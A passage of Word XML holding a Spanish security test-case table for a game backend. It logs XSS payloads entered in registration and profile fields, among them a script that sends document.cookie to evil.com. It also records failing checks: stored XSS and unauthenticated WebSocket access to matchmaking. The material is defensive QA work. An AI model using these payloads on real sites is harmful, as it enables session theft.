                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-03]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Registrar con username: "&lt;img src=x onerror=alert(1)&gt;".
2. Verificar contenido en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Username sanitizado o registro rechazado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 201. Payload con onerror almacenado sin modificar en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register</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Backend corriendo.</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1. Registrar con username: "javascript:alert(document.cookie)".
2. Verificar en BD.</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Username sanitizado o rechazado.</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HTTP 409 (username existente) — protocolo javascript: rechazado indirectamente. Pasa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-03]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Registrar con username: "&lt;svg onload=alert(1)&gt;".
2. Verificar en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Username sanitizado o rechazado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 201. Payload SVG/onload almacenado en BD sin sanitizar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Perfil
PUT /profile
[DEF-SEC-03]</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Usuario autenticado con JWT.</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1. PUT /profile con bio: "&lt;script&gt;fetch(evil.com)&lt;/script&gt;".
2. Leer campo bio en BD.</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bio sanitizado (sin etiqueta script).</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bio almacenado: "&lt;script&gt;fetch(\"http://evil.com?c=\"+document.cookie)&lt;/script&gt;". XSS almacenado en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-08 — Autenticación WebSocket [DEF-SEC-04]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket
ws://localhost/ws
[DEF-SEC-04]</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Backend corriendo.
Servidor WebSocket activo en /ws.</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1. Conectar WebSocket SIN token JWT.
2. Verificar si handshake es rechazado.</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Conexión rechazada (error en ws.on("error")).</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Conexión aceptada. Server envía {"type":"connected","clientId":"xxx"}. Sin autenticación requerida.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket
ws://localhost/ws
[DEF-SEC-04]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Conectar sin JWT.
2. Enviar {"type":"join","username":"hacker_sin_auth"}.
3. Verificar si es admitido en cola.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No recibir {"type":"waiting"} (cola rechaza sin auth).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Recibe {"type":"waiting"}. Cliente sin JWT admitido en cola de matchmaking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket
ws://localhost/ws-fake</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Backend corriendo.</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1. Conectar a ruta /ws-fake (incorrecta).
2. Verificar rechazo.</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Conexión rechazada (error en handshake).</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Conexión rechazada. ws.on("error") disparado correctamente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-09 — Exposición de datos sensibles en respuesta API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</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Usuario autenticado con JWT.</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1. GET /profile con JWT válido.
2. Verificar ausencia de password y __v.</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HTTP 200. Sin campos password ni __v.</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HTTP 200. {"_id":"...","email":"...","username":"...","elo":1200}. Sin password ni __v.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Usuario registrado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST /auth/login con credenciales válidas.
2. Verificar ausencia de password en body.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200 con token y username. Sin campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. {"token":"eyJ...","username":"sensitiveuser"}. Sin campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register</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Backend corriendo.</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1. POST /auth/register.
2. Verificar que body no exponga password ni _id.</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HTTP 201. Body sin password ni _id.</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HTTP 201. {"message":"User registered successfully"}. Sin password ni _id.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
